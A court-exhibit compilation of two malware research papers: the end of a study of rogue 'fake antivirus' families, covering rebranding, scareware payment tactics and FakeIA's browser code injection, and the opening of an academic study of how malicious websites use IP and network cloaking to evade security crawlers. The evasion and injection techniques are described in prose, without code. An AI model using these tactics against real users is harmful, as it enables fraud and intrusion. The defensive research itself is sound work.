In November 2008, Win32/FakeSecSen was added to the list of families detected and cleaned by *MSRT*. *MSRT* was released on 11 November. At the time, updated variants of the rogue were being released, on average, every two days. By 24 November 2008, *MSRT* had removed the rogue from more than one million distinct computers. On 24 November we saw the last new variant of Win32/FakeSecSen.

Win32/FakeXPA was added to *MSRT*'s family list in December 2008. *MSRT* removed it from approximately

400,000 machines in the first week. While significantly smaller than the number of computers cleaned of Win32/FakeSecSen, this was still a relatively large number for a new family.

The kind of changes that Win32/FakeXPA makes in order to evade detection are more sophisticated and yet would require less time and effort to accomplish than those of Win32/FakeSecSen. By introducing new anti-emulation checks into its de-obfuscation code rather than changing the functional code underneath, Win32/FakeXPA has proven much more adaptable. Win32/FakeXPA's creators could have a list of anti-emulation techniques targeted at any given malware scanner; once the scanner handles one, they could simply move on to the next one. If a scanner begins to detect their de-obfuscation code, adapting it would be more difficult, but this code can be made extremely polymorphic. Without access to the polymorphic engine that generates this code, detection for it tends to be hit and miss.

By contrast, Win32/FakeSecSen's creators modified the structure – or even the behaviour – of the program itself. Especially when a scanner's detection is based on behaviour observed by emulating the sample, this could be a lengthy process of trial and error.

Win32/FakeSecSen didn't disappear completely when development on it ceased, but its prevalence dropped dramatically. Win32/FakeXPA, which has been updated continuously, remains common.



*Figure 11: Removals of Win32/FakeSecSen and Win32/FakeXPA by MSRT.*

## CHANGING BRANDS

So far, all of the survival techniques we have examined could be applied to any kind of malware. Indeed, many of them are used in obfuscators that have applied to many different types of malware. Rogues also face survival challenges that don't apply to other kinds of malware, however.

A brand is something most companies cultivate and protect, so that potential customers might recognize it, but malware creators don't want their software to be recognized for what it is. Searching the web for 'Antivirus 2009', for example, returns a lot of results that clearly label it as unwanted, with information on how to remove it. 'Antivirus 2009', by itself, is clearly not a good brand.

One way that rogues have tried to counter this is by constantly changing their brands, sometimes even using multiple brands at once. Win32/FakeSecSen used 12 different names, each with a different user interface appearance or

THE MODERN ROGUE – MALWARE WITH A FACE  O'DEA



*Figure 12: Win32/FakeSecSen with 'Vista Antivirus 2008' skin.*



*Figure 13: Win32/FakeSecSen with 'Spyware Preventer' skin.*

'skin', most of which were being updated and maintained concurrently.

The code and functionality of the rogue was virtually identical from one variant – or 'brand' – to the next. The file names that were used when the rogue was installed varied and the interface elements (buttons, banners and so on) were stored in resources within the rogue binary. Only the resources needed to be changed to give it a different look and feel; Win32/FakeSecSen was effectively 'skinnable'. This led to many security vendors giving different variants of the rogue completely different names, such as 'Antivirus2008' and 'SpywarePreventer'. Any generic detection for the rogue, however, was unlikely to differentiate one variant from another. These multiple brands also caused confusion between completely different rogues, such as Win32/FakeSecSen (calling itself 'Windows Antivirus 2008', 'Vista Antivirus 2008' and similar names) and Win32/FakeXPA (calling itself 'XP Antivirus 2008').

Win32/FakeXPA was a very different beast from the start. Rather than maintaining multiple brands for the same product simultaneously, its creators would introduce a new variant from time to time, quickly 'retiring' the old brand. There are two distinct rogues that *Microsoft* calls Win32/FakeXPA (as they have shared some common code). The one we will examine is the most actively updated and has extensively used code obfuscation and anti-emulation techniques. Its core functionality has changed very little over time. It is



*Figure 14: Win32/FakeXPA installer from November 2007.*



*Figure 15: Win32/FakeXPA fake scanner from November 2007.*

distributed as a small installer, which displays a message box offering a link to its terms and conditions and waits for the user to click 'continue' or 'next' before downloading and installing the phony scanner.

The current version of Win32/FakeXPA, as of June 2009, calls itself 'Personal Antivirus' rather than 'XP Antivirus' and boasts a much more sophisticated look, but operates in exactly the same way.

In between the early 'XP Antivirus' and the latest 'Personal Antivirus' versions, the rogue has been named 'Antivirus 2009', 'Antivirus 360' and, for a short time, 'Total Security'.

## THE ROGUE DIFFERENCE

A rogue's brand is one of the elements that separates rogues



*Figure 16: Win32/FakeXPA installer from June 2009.*

THE MODERN ROGUE – MALWARE WITH A FACE  O'DEA



*Figure 17: Win32/FakeXPA scanner from June 2009.*

from most other types of malware. A rogue needs a brand or a name associated with it because, to make money, people must willingly pay for it.

## DIRECT PAYMENT

Regardless of the actions or behaviour of the malware involved, the rogue creator gets their revenue directly from the end-user; that is, the person interacting with the malware. This clearly has advantages over other malware money-making schemes, such as spam, where more steps are involved. It is even more direct than a password stealer simply grabbing a credit card number. The user whose credit card is charged for a rogue is not going to report it stolen if they authorized the transaction. This is also a drawback, of course. Getting the rogue installed isn't enough. People must be guided to the payment page and convinced to go through with the transaction.



*Figure 18: Payment page for Win32/Winwebsec, including 'discount' lifetime licence, 'Sytem Tuner' bundle and 'Premium Support' checked by default.*

Some payment pages include social engineering of their own, offering bundle deals and lifetime subscriptions for low prices, but this is just the final stage of a process that commonly starts before any malware is even installed.

## END-TO-END SOCIAL ENGINEERING

Most of the techniques rogues use to install themselves rely heavily on user interaction, such as redirecting the user's browser to a fake online scanner before even offering a malware binary to download. One of the reasons they go to these lengths is that the malware itself is part of a larger social engineering attack. This attack begins before the rogue is installed, maybe with a pop-up 'security warning' from your browser, before an online scanner is loaded.



*Figure 19: Pop-up message displayed by a Win32/FakeXPA fake scanner web page.*

The process continues with the online scan which tells you that you need to install security software. The security software then tells you that there is malware on your system and that you must register the software to remove it. As we've seen, some rogues go further, with components that imitate elements of the operating system and browser to reinforce your need for the rogue and, in particular, how to go about paying for it. But even for the most basic rogue, the social engineering attack doesn't finish at this point. For stage three (profit), the rogue needs you to enter your credit card number on an order form. Only then has the malware served its purpose.

In many cases, even the order form is not quite the end. You will most likely receive working registration details which will 'activate' the rogue, at which point it will turn off its fake warnings and tell you that it has cleaned the system. This is not just to make you believe you got something for your money, but also to deter you from installing real security software that might recognize other malware that was installed with the rogue and might be still active.

## SOFTWARE AS MARKETING

Many years ago, virus payloads typically had obvious effects. Often they would destroy data or display messages or graphics that would immediately alert the user to the fact that something was wrong. As profit became the near universal motivator for writing malware, payloads became invisible. Anything that notified the user that something was wrong with their system might lead to the malware being found and removed.

In a way rogues, as malware payloads, hark back to the payloads of old; they want you to know that they are running. But where the messages that the old viruses displayed could be likened to graffiti, the messages displayed by a rogue are advertisements. In fact, the entire program is an

advertisement, usually with no other significant functionality at all. Its purpose is simply to convince people to pay money for it. Not surprisingly, rogue creators have preferred advertising tactics that are generally considered questionable at best – lying, exaggerating and promoting fear.

Some of the falsehoods perpetrated by rogue marketing are taken from real and legitimate messaging, but twisted to be applied in the wrong context. A basic example is in the icons that rogue applications use. Win32/FakeSecSen often used an icon identical to that of the *Windows Security Center*, for example. The general look and feel of most rogues is similar to many legitimate security products; in some cases it is a direct copy.

These tactics start at the rogue web pages. Win32/FakeSpyPro, for example, uses a web page with a similar shield logo and colour scheme to *Microsoft*'s own security portal.



*Figure 20: Win32/FakeSpyPro web page.*



*Figure 21: Genuine Microsoft Malware Protection Center web page.*

The testimonials on Win32/FakeSpyPro's website are not original either. Several are taken from http://www.norton-antivirus-online.com/norton-antivirus-testimonials.html (with the product name changed, of course).

Other rogues take a more original approach but tend more towards exaggeration and fear-mongering. Figure 24 shows



*Figure 22: Testimonials from Win32/FakeSpyPro web page.*

*Figure 23: Testimonials from http://www.norton-antivirus-online.com/norton-antivirus-testimonials.html.*

an excerpt from the website for a rogue called Win32/FakePlus.

This type of disreputable advertising is comparable to the behaviour that makes the software itself potentially unwanted. In some cases both the claims on the website and the behaviour of the software itself fall into a grey area. The

THE MODERN ROGUE – MALWARE WITH A FACE  O'DEA



*Figure 24: Excerpt from Win32/FakePlus web page.*

assertions may be exaggerated but not patently false, and the software limited in functionality but harmless. There are many examples of registry 'fixers' that do indeed clean the *Windows* registry of unnecessary entries; however, the positive effects on the computer's performance and security are likely to much less than the software's authors claim. When it comes to most modern rogues, however, the claims are blatant lies and the software itself detrimental to the computer it runs on. Copying the logos, icons and testimonials of legitimate security software is just the beginning. The trend over the last couple of years has been to imitate elements of the typical user experience in order to exploit people's trust in the things they use every day: their operating system, their browser and even their search engine.

Nearly all of the most prevalent rogues in recent times have imitated *Windows*' security messaging in one way or another. A common technique is to display an imitation of the *Windows Security Center*.

These are usually accompanied by pop-up messages from a system tray icon. Where real *Windows Security Center* messages recommend installing anti-virus software, rogue security centres customarily recommend registering the rogue. Where the real Security Center directs you to a page on the *Microsoft* website that provides a list of anti-virus products to choose from, a rogue security centre will take you directly to a web page where you can pay for the rogue.

This kind of behaviour is clearly malicious. Apart from misrepresenting *Microsoft*'s recommendations, these usually replace or at least obscure the real Security Center and present an inaccurate picture of the state of the computer's security. Not only is the displayed state of the machine's virus protection false, but so are those of the firewall and automatic updates.

Rogues have extended this behaviour to other areas of the operating system, from changing the desktop background to






*Figure 25: Fake Windows Security Center windows displayed by Win32/FakeXPA (top left), Win32/FakeSpyguard (top right), Win32/WinSpywareProtect (bottom left), and Win32/FakeRean (bottom right).*

displaying phony 'blue screen of death' crash messages. Several take the same technique to the browser, displaying messages that imitate *Internet Explorer*'s own security messages. Win32/Yektel, which is installed by Win32/FakeXPA, displays drop-down messages and full page warnings within *Internet Explorer* claiming to be from the browser itself. As with the fake security centre messages, they then direct the user to a payment page to register the rogue. Some variants of Win32/Yektel also add warnings, claiming to be from *Google*, to any pages from URLs with the word 'google' in them.



*Figure 26: A drop down message displayed in Internet Explorer by Win32/Yektel.*

When Win32/Yektel displays a full page warning message it effectively blocks access to the page that the user was trying to visit. This is an example of the second type of tactic that rogues creators use to persuade people to pay them money – extortion.

## SOFTWARE AS EXTORTION

Most rogues go beyond aggressive marketing to sell software that has limited or no functionality. Rogues not only display warnings to promote a solution to a non-existent problem; in some cases they render the computer difficult to use, displaying constant pop-up windows or restricting normal functionality.

In May 2009, Win32/Winwebsec went as far as blocking execution of most programs altogether. Rather than blocking specific programs, it contained a list of programs that it allowed to run. This would lead to most programs failing, making removal of the rogue difficult; however, the technique was also used to further encourage payment of the rogue. Each time a program was blocked, Win32/Winwebsec would display the message shown in Figure 27, falsely reporting an infection and urging the user to activate (i.e. pay for) the rogue.



*Figure 27: A false Win32/Winwebsec file infection report.*

This behaviour is similar to that of so-called 'ransomware' such as Win32/SMSer, which effectively locks the machine and demands payment to regain access. Other rogues use similar techniques, albeit in more subtle ways. Frequent, repeated pop-up warnings of security compromise are the most common practice. Win32/WinSpywareProtect, for example, shows alert windows that appear in the centre of the screen, others that 'slide' in from the right-hand side of the screen, as well as pop-ups from the system tray. The windows it displays float on top of all other windows and provide no mechanism to be minimized or closed. Any attempt to clear

the messages usually leads either to a registration window or a second warning. The sequence of answers required to escape each warning is to answer 'no' and then 'yes'. For example, when the rogue's scan has finished, it displays the message:

```
There are serious threats detected on your computer.
Your privacy and personal data may not be safe. Do
you want to Clean and Protect your PC?
```

To remove this warning one must either click the 'Yes, remove threats' button and enter the registration process, or click 'No, continue unprotected' and be presented with a second warning message:

```
Are you sure? Your PC will not be protected against
spyware.
```

This time one must click 'Yes, continue unprotected' to finally escape the warnings or 'No, purchase full version' to start the registration process. A similar process must be followed for all of the rogue's warning messages, which generally appear at least once a minute. As the messages float on top of other windows, the user has little choice but to interact with them. Eventually they are likely to tire of the messages and register the rogue just to be rid of them.





*Figure 28: Win32/WinSpywareProtect warning dialogs.*

As mentioned earlier, Win32/Yektel regularly displays a fake error message in *Internet Explorer* instead of the web page that the user tried to load. Win32/InternetAntivirus installs a component called Win32/FakeIA that displays similar errors, but accomplishes its purpose in a different way. Win32/Yektel is installed as a Browser Helper Object (BHO), enabling it to intercept content that is rendered by *Internet Explorer*. BHOs can be managed through *Internet Explorer*'s 'Manage Add-ons' feature and as such, Win32/Yektel is quite simple to disable if you know what you are looking for. Win32/Yektel gives its BHO the innocuous name 'Research' or 'Helper' in a small attempt to conceal its true purpose.

Win32/FakeIA does not install a BHO, but instead uses code injection, calling WriteProcessMemory() to write its code into the browser's process and CreateRemoteThread() to execute that code. It can inject into iexplore.exe (*Internet Explorer*) and firefox.exe (*Firefox*) using this method, hooking the APIs send(), recv(), connect() and getaddrinfo(). This makes it harder to recognize the source of the browser's behaviour and also enables a wide range of functionality. Win32/FakeIA displays two types of error messages; one claims to originate from the browser and the other imitates the *Google* search malware warning page. But Win32/FakeIA goes a lot further than that. Just like a real *Google* warning, this page has a link to www.stopbadware.org. The link is to the real stopbadware.org, but if that link is clicked, Win32/FakeIA

intercepts the request and 'redirects' it, sending it to a domain that returns pages that imitate www.stopbadware.org. These imitations invariably report that the website the user tried to visit has been reported as a bad site. They contain a link with the text 'Click to buy Antivirus', but this doesn't point at anything suspicious either; it points to a *Google* search for the term 'antivirus'.



*Figure 29: Imitation stopbadware.org report loaded by Win32/FakeIA.*

Win32/FakeIA interferes with searches for 'antivirus' as well, but it doesn't do anything as obvious as poisoning the results to point to a page belonging to the rogue. Instead it allows the normal search results to be returned and redirects any links that the user follows from those results. This elaborate process is just another way to accomplish the two goals of any rogue creator: convince the user they need protection and direct them to pay the rogue maker for that protection. People who aren't convinced by a recommendation from an unknown source may be more likely to be swayed by seemingly genuine messages from a source they trust. Even those that are wary of recommendations that seem to come from their browser or search engine are likely to be less suspicious of sites they arrive at through actively searching for a term like 'antivirus'.

Win32/FakeIA also prevents the browser from retrieving pages from many domains that offer security products and advice. This is a basic malware technique for self-preservation, but Win32/FakeIA does this too with more subtlety than most. It permits the host name lookup and even the connection to the remote server, but it doesn't pass through the data that the browser sends. So the browser waits for a response to its request but gets no answer, as the request never actually gets sent. Eventually the browser times out, as it would if the server was unresponsive. By filtering the requests from its send() hook, Win32/FakeIA is also able to block a particular path such as 'google.com/webmasters', rather than the entire google.com domain. It also allows the technique to work if the affected browser uses a proxy. As some of the substrings that will cause Win32/FakeIA to block a request are quite general, such as 'spyware' and 'viruses', it also contains a 'whitelist' of domains that are always allowed. This includes the rogue's own payment sites and most search engines.

Of course, all of the fake security warnings that rogues display are in fact a sign that the computer does have a security problem. Like the mob boss who demands payment for 'protection', rogues supply not just the offer of security, but the threat itself. The standard malware techniques rogues use to conceal themselves and avoid removal are likely to reinforce the idea that there is something wrong with the computer. Many rogues are either installed with other

malware, or install other malware themselves. Win32/InternetAntivirus installs a password stealing trojan called Win32/Chadem, and Win32/Winwebsec sometimes downloads a worm called Win32/Swimnag, for example. Rogues have often been installed by malware such as Win32/Cbeplay, which at the same time installs a spam bot like Rustock or Cutwail. Some proportion of users affected by this other malware is likely to notice something wrong and look for a solution. If a rogue was installed at the same time, its warnings of malware and security compromise are likely to be quite convincing.

## CONCLUSION

The most widespread rogues are not merely overzealous security programs, but malware that is constructed and distributed in a fashion similar to backdoors, password stealers and spam bots. Displaying false alerts of system compromise and eliciting payment for protection is the direct payload of many of the most common malware families today. Not only are rogues themselves common, but they are also the indirect payload for many other malware families, including sophisticated examples such as Win32/Waledac and Win32/Koobface. The prevalence of the rogues, combined with the amount of work that goes into developing and updating them, demonstrates that they are a successful and popular money-making tool for malware authors. Rogues face unique challenges in terms of distribution, survival and exploiting their targets, but they have already proven resilient and are likely to remain a significant part of the malware landscape for some time to come.

## FURTHER READING

For more information on the malware discussed in this paper, please see the *Microsoft Malware Protection Center*: http://www.microsoft.com/security/portal/.

Descriptions of the rogues mentioned throughout the paper can be found at these locations:

- Win32/FakeSecSen
  http://www.microsoft.com/security/portal/Entry.aspx?Name=Trojan:Win32/FakeSecSen
- Win32/FakeXPA
  http://www.microsoft.com/security/portal/Entry.aspx?Name=Trojan:Win32/FakeXPA
- Win32/Winwebsec
  http://www.microsoft.com/security/portal/Entry.aspx?Name=Trojan:Win32/Winwebsec
- Win32/InternetAntivirus
  http://www.microsoft.com/security/portal/Entry.aspx?Name=Trojan:Win32/InternetAntivirus
- Win32/FakeSpyguard
  http://www.microsoft.com/security/portal/Entry.aspx?Name=Trojan:Win32/FakeSpyguard
- Win32/WinSpywareProtect
  http://www.microsoft.com/security/portal/Entry.aspx?Name=Trojan:Win32/WinSpywareProtect
- Win32/FakeSpyPro
  http://www.microsoft.com/security/portal/Entry.aspx?Name=Trojan:Win32/FakeSpyPro

- Win32/FakeRean
  http://www.microsoft.com/security/portal/Entry.
  aspx?Name=Trojan:Win32/FakeRean

- Win32/FakePlus
  http://www.microsoft.com/security/portal/Entry.
  aspx?Name=Trojan:Win32/FakePlus

- Win32/Yektel
  http://www.microsoft.com/security/portal/Entry.
  aspx?Name=Trojan:Win32/Yektel.A

- Win32/FakeIA
  http://www.microsoft.com/security/portal/Entry.aspx?Na
  me=TrojanDownloader:Win32/FakeIA.A

- Win32/FakeRemoc
  http://www.microsoft.com/security/portal/Entry.
  aspx?Name=Trojan:Win32/FakeRemoc

- Win32/Winfixer
  http://www.microsoft.com/security/portal/Entry.
  aspx?Name=Program:Win32/Winfixer

- Win32/Antivirusxp
  http://www.microsoft.com/security/portal/Entry.
  aspx?Name=Trojan:Win32/Antivirusxp

## REFERENCES

[1]   Crossbows. XKCD, http://xkcd.com/564/.

[2]   Google Trends: 2 April 2009.
      http://www.google.com/trends/hottrends?sa=X
      &date=2009-4-2.

[3]   What Are Doorway Pages? Search Engine Watch
      (SEW). http://searchenginewatch.com/2167831.

[4]   Spam Alert: Huge Volumes of Fake CNN News
      Updates. MX Logic IT Security Blog.
      http://www.mxlogic.com/itsecurityblog/1/2008/08/
      Spam-Alert-Huge-Volumes-of-Fake-CNN-News-
      Updates.cfm.

[5]   Errorsafe. Mike On Ads. http://www.mikeonads.com/
      what-is-errorsafe-and-how-do-we-stop-it/.

[6]   Court Halts Bogus Computer Scans. Federal Trade
      Commission. http://ftc.gov/opa/2008/12/
      winsoftware.shtm.

[7]   Stewart, J. Rogue Antivirus Dissected – Part 2.
      http://www.secureworks.com/research/threats/rogue-
      antivirus-part-2/.

[8]   Wu, S.; Zink, T.; Molenkamp, S. Where is Waledac?
      Virus Bulletin June 2009, p.S2.
      http://www.virusbtn.com/spambulletin/
      archive/2009/06/sb200906-waledac-spambot.

[9]   Macalintal, I.; Ferguson, P. DOWNAD/Conficker
      Watch: New Variant in The Mix?
      http://blog.trendmicro.com/downadconficker-watch-
      new-variant-in-the-mix/.

[10]  Molenkamp, S. Anti-Social Networking.
      http://blogs.technet.com/mmpc/archive/2009/03/10/
      anti-social-networking.aspx.

[11]  Williams, J. Win32/Koobface, MSRT and Industry
      Cooperation. http://blogs.technet.com/mmpc/
      archive/2009/04/02/win32-koobface-msrt-and-
      industry-cooperation.aspx.

# APPENDIX 11



International Journal of Computers and Applications

ISSN: 1206-212X (Print) 1925-7074 (Online) Journal homepage: https://www.tandfonline.com/loi/tjca20

# Real-world IP and network tracking measurement study of malicious websites with HAZOP

Masood Mansoori, Ian Welch, Kim-Kwang Raymond Choo, Roy A. Maxion & Seyed Ebrahim Hashemi

**To cite this article:** Masood Mansoori, Ian Welch, Kim-Kwang Raymond Choo, Roy A. Maxion & Seyed Ebrahim Hashemi (2017) Real-world IP and network tracking measurement study of malicious websites with HAZOP, International Journal of Computers and Applications, 39:2, 106-121, DOI: 10.1080/1206212X.2017.1283910

**To link to this article:** https://doi.org/10.1080/1206212X.2017.1283910

Published online: 07 Mar 2017.

Submit your article to this journal ⏎

Article views: 102

View related articles ⏎

View Crossmark data ⏎

Full Terms & Conditions of access and use can be found at
https://www.tandfonline.com/action/journalInformation?journalCode=tjca20

INTERNATIONAL JOURNAL OF COMPUTERS AND APPLICATIONS, 2017
VOL. 39, NO. 2, 106–121
http://dx.doi.org/10.1080/1206212X.2017.1283910



# Real-world IP and network tracking measurement study of malicious websites with HAZOP

Masood Mansoori[a] ⬛, Ian Welch[a], Kim-Kwang Raymond Choo[b] ⬛, Roy A. Maxion[c] ⬛ and Seyed Ebrahim Hashemi[d]

[a]School of Engineering and Computer Science, Victoria University of Wellington, Wellington, New Zealand; [b]School of Information Technology & Mathematical Sciences, University of South Australia, Adelaide, Australia; [c]Dependable Systems Lab, Computer Science Department, Carnegie Mellon University, Pittsburgh, PA, USA; [d]Department of Computer Engineering, University of Larestan, Fars, IRI

**ABSTRACT**

IP tracking and cloaking are practices for identifying users which are used legitimately by websites to provide services and content tailored to particular users. However, it is believed that these practices are also used by malicious websites to avoid detection by anti-virus companies crawling the web to find malware. In addition, malicious websites are also believed to use IP tracking in order to deliver targeted malware based upon a history of previous visits by users. In this paper, we empirically investigate these beliefs and collect a large data-set of suspicious URLs in order to identify at what level IP tracking takes place that is at the level of an individual address or at the level of their network provider or organization (network tracking). We perform our experiments using HAZard and OPerability study to control the effects of a large number of other attributes which may affect the result of the analysis. Our results illustrate that IP tracking is used in a small subset of domains within our data-set, while no strong indication of network tracking was observed.

**ARTICLE HISTORY**
Received 14 March 2016
Accepted 9 January 2017

**KEYWORDS**
Client honeypot; IP tracking; network tracking; malicious websites; HAZOP

## 1. Introduction

Websites collect a wealth of information about visiting users such as their IP address, network provider, web browser, and operating system configuration information. This information is gathered from the user's IP address, HTTP header values, and from code embedded within the website that is downloaded and executed within the browser. Geolocation services such as Maxmind [1] can be used to further infer user location, spoken language, economic position, and cultural information from the visiting user's IP address. Websites may also monitor the activities of a particular visitor over time using the visitor's IP address. For example, the pattern of requests by a visitor can be recorded simply by logging IP addresses with the timestamp of the visit and record of what content was delivered at that time. Monitoring what and how content are retrieved, a website can associate a behavior to a certain IP address. This information can be used to decide what content to provide to the visitor on future visits.

The process by which a website monitors the behavior of visiting users using their IP addresses is known as IP tracking. IP tracking is the initial reconnaissance process which allows the website to provide or deny visitors' specific services or content. It is known that IP tracking is supported by various Crimeware kits (e.g. Blackhole exploit pack) for determining what malware to deliver to website visitors, however, there has been few empirical research into the extent. Additionally, it is also believed that these kits can be configured to track visitors not just at the individual level but at the level of an organization identified by IP subnet (we term this network tracking). These would be used to ensure that any visitor from say an antivirus organization or a visitor with suspicious activity is identified as potential bots crawling the web to find malware. The contribution of this paper is to empirically investigate the behavior of websites in terms of malware delivery based on the experiments where we deliberately control the visitation pattern and number of retrievals by web crawlers collecting malware from websites. We analyze the data collected to determine the extent to which IP tracking and network tracking is actually used. Perhaps surprisingly, we find less evidence of both than we would have expected according to widely held beliefs.

## 2. Related work

IP and network tracking have been mentioned by many researchers as a technique employed by malicious

**CONTACT** Masood Mansoori ✉ masood.mansoori@ecs.vuw.ac.nz

© 2017 Informa UK Limited, trading as Taylor & Francis Group

INTERNATIONAL JOURNAL OF COMPUTERS AND APPLICATIONS   107

websites to mitigate detection by security tools, organizations, and search engine companies. These studies investigated IP and network tracking using IP addresses and network subnets of high-profile security and search engine companies [2–4]. O'Dea and Hamish [2] studied the behavior of rogue malware disguised as antimalware software and their evolution. Target selection and malware delivery relied on monitoring a visiting user's browser, referer, and IP address. Visitors with Microsoft IP address, for instance, were redirected to a benign website. IP tracking can also be performed at an individual visitor level in which, only the behavior and not the public profile of the visiting user is monitored for suspicious activity and succeeding visits.

There are few scholarly studies on the prevalence of IP and network tracking being used at an individual visitor level. Erete et al. [3] proposed and designed a distributed honeyclient which uses idle processing cycles of participating users' desktops to retrieve and detect malicious websites. Allowing average users to participate in malware retrieval and analysis enables such a design to easily mitigate IP cloaking techniques as varying IP addresses are used for each retrieval. Their system is in principal similar to honey@home server honeypot which is deployed for detection of server-side attacks [5]. Their small-scale study on 35,000 URLs revealed a minority of detected malicious subset (i.e. 1294/33) utilized IP tracking infrequently. Stringhini et al. [4] proposed a system relying on analysis of the chain of redirections by malicious domains rather than static or dynamic analysis of the URL content. Redirections point average visitors to the final domain that hosts the appropriate malware for the visiting user's system and browser environment. Their system similarly uses the log files of browserwebserver interaction of a large number of participating users. Their proposed system is capable of detecting IP and network cloaked website but relies on several distinct redirection to achieve accurate detection.

Wang et al. [6] and Rajab et al. [7] performed a large-scale study of malicious websites and investigated several aspects including IP tracking behavior over a long period. Their IP tracking experiments, however, focused on IP and network profile tracking of malicious website in which IP addresses from subnets belonging to well-known security or search engine companies are monitored and served with benign content. Our experiment on the other hand, focuses on the relationship between malware delivery and the history and pattern of visits by single or adjacent nodes in a network identified by their IP address. A study by Zeeuwen et al. [8] on update patterns of malware download centers (including IP tracking), and their relative prevalence focused on designing a re-scheduling algorithm to effectively download malicious binaries from malware download centers. Their study in 2010–2011 periods did not result in conclusive evidence of IP tracking on a small set of 5000 malicious websites. Their research is similar to ours in terms of monitoring IP tracking and blacklisting behavior, however, on a very small set of URLs and different experimental setup, properties and visitation pattern and does not cover network tracking.

## 3. IP and network tracking and cloaking

The process by which specific content is delivered as a result of prior IP tracking activity is known as IP cloaking. The process is not necessarily illicit in nature as it is widely used by benign websites to deliver specific content to users based on their IP and corresponding information gathered from a user. For example, a 2013 inquiry by the Australian Government House of Representatives Standing Committee on Infrastructure and Communications, for example, found that the 'geo-blocking' practices (i.e. methods adopted by businesses to differentiate between regions and keep customers separate) resulted in Australian consumers and businesses pay[ing] much more for their IT products than their counterparts in comparable economies. In many cases, Australians pay 50-100

### 3.1. IP tracking and cloaking

IP Cloaking is a defensive approach used by malicious websites to lower the risk of detection. The lower risk of detection is a direct result of anti-forensic practice in which a malicious website subjects its code to a limited and few selected visitors. The ideal targets of malicious websites are content-requesting IP addresses which do not present any suspicious activity and possess the required environment in terms of operating system and browser vulnerabilities. The suspicious activity and profile presented by an IP address can be in the form of (1) Suspicious information about the owner of the IP address (2) The pattern of interaction with the website. The primary challenge is distinguishing average users from automated security tools.

Information about an IP address may be associated with detection tools or point to a security organization. In such a scenario, the website can mitigate detection by serving benign content to the requesting client. Association of IP addresses with security organizations is performed through matching the IP address against a database of known and active security companies. Such databases and services are freely and commercially available online. Such a defensive approach requires few resources to implement and is utilized by many Crimeware

Case 0:20-cv-60416-AMC   Document 69-2   Entered on FLSD Docket 05/26/2021   Page 130 of 143

108   M. MANSOORI ET AL.

and Browser Exploit Packs (BEPs) (e.g. Red Kit, Eleanore, CrimePack, Blackhole Exploit Pack) [10,11]. Effectiveness of such a simple mitigation strategy has contributed greatly to its popularity with malicious websites. According to Rajab et al. [7] IP cloaking contributes significantly to the overall number of malicious web sites found by our system.

Malware delivery may also vary based on pattern of visit by visiting users. Malware delivery changes depending on the history of visits by users identified by their IP addresses. Generally, a malware is delivered to a client if it detects an IP address retrieving content for the first time. This is achieved by keeping a list of IP addresses accessing the content. A subsequent visit is matched against the list and results in redirection to a benign website. This is to avoid detection by security tools which tend to access a malware delivery websites on regular basis to either determine if it is still malicious or gather different and up-to-date version of malware served by the website [8]. There are various approaches security vendors use to detect malicious websites using IP tracking and IP cloaking evasion techniques. Some of these counter-responses may include: varying IP ranges, varying time intervals between each visit to avoid giving the impression of a crawler and introducing randomization into the visiting algorithm [7,8]. In this paper, we will perform an experiment using varying IP addresses and retrieval time.

### 3.2. Network tracking and cloaking

Similar to IP tracking, tracking network and cloaking is the process of monitoring the behavior and profile of visiting users' IP addresses by a website and serving different or specific content accordingly. Network tracking and cloaking allows malicious domains to mitigate detection through tracking and serving benign content to IP addresses suspected of belonging to known security or research firms [7].

A malicious website could also potentially block malware delivery to all IP addresses belonging to a certain subnet with suspicious activity (i.e. crawlers) or on suspicion of hosting client honeypots or detection systems [12]. Network banning and cloaking feature has been observed in multiple Browser Exploit Packs [10] and can be easily implemented by malicious websites. The primary purpose of network and subnet tracking is detection mitigation. Magnitude Exploit Kit for instance keeps a database of 1400 IP range records of high-profile companies, security, and law agencies [13]. The inclusion of range of IP addresses and subnets allows for easier updatability compared to single unique IP address lists.

Our experiment in network tracking does not include analysis of attacks on high-profile subnets as access to an IP address in a large security organization was not available. Our experiment however focused on determining if suspicious activity by an IP address would result in varying website behavior toward adjacent IP addresses which most likely belonged to the same network.

## 4. Experimental setup

Analogous to studies on web spam, tracking experiments rely on multiple copies of a websites for attack detection [14–16]. Multiple copies are then analyzed for inconsistencies and availability of malicious content within a retrieved copy. The repeated measurement experiment involves the process of fetching a suspicious list of URLs from different nodes in various stages to identify a pattern of IP and network tracking and cloaking activity. There are few attributes besides IP address and network subnets which could potentially have large effect on the number of delivered malware. We identified such attributes in our detailed study of HAZard and OPerability (HAZOP) approach based on a hypothetical IP tracking experiment [17]. In this paper, we apply HAZOP approach to real-world IP and network tracking experiments throughout the experiment design process and thoroughly examine every component and process of the experiment. The purpose of our HAZOP study was to:

- Identify the attributes and components of the experiment which may introduce bias into the study and result in incorrect analysis.
- Identify deviations from the intent of the study which could occur as the result of the large number of system and environmental variables.
- Identify severity and likelihood of those hypothetical deviations and recognize the possible consequences to the intent or accuracy of the study.
- Determine any actions or steps to be taken in order to mitigate those experimental threats or minimize their effects.
- Identify the attributes and components of the experiment which may introduce bias into the study and result in incorrect analysis.
- Identify deviations from the intent of the study which could occur as the result of the large number of system and environmental variables.
- Identify severity and likelihood of those hypothetical deviations and recognize the possible consequences to the intent or accuracy of the study.
- Determine any actions or steps to be taken in order to mitigate those experimental threats or minimize their effects.

HAZOP study was originally found in chemical engineering and is extensively used and applied to safety critical

systems [18,19]. Its objective is to rigorously analyze the components of a safety critical system and identify the hypothetical hazards that could take place. In the context of this paper, risk, hazards and deviations our context, risks and hazards could translate into increased risk of measurement bias, which would impact the internal and external validity of the study. Through identification of confounding variables, a high internal validity can be achieved through confidence that the results of the experiment are caused by only one independent variable. The independent variables in our experiments are IP addresses and network subnets respectively. Confounding variables on the other hand belong to various systems and environmental attributes within our experiment design.

Following HAZOP methodology, we applied keywords to hypothetical situations in which deviations from the intent of the study could occur as the result of threats and bias such as components' variables in the experiment's design, module or process failure and identified actions to be taken in the context of our client honeypot and experiment's design. We initially divide the experiments into distinct categories of client honeypot, the process of retrieval and analysis and the subjects of the study and subsequently analyze each for confounding attributes.

### 4.1. Apparatus

Aparatus in our study refers to the client honeypot and any modules involved in retrieval and detection of attacks.

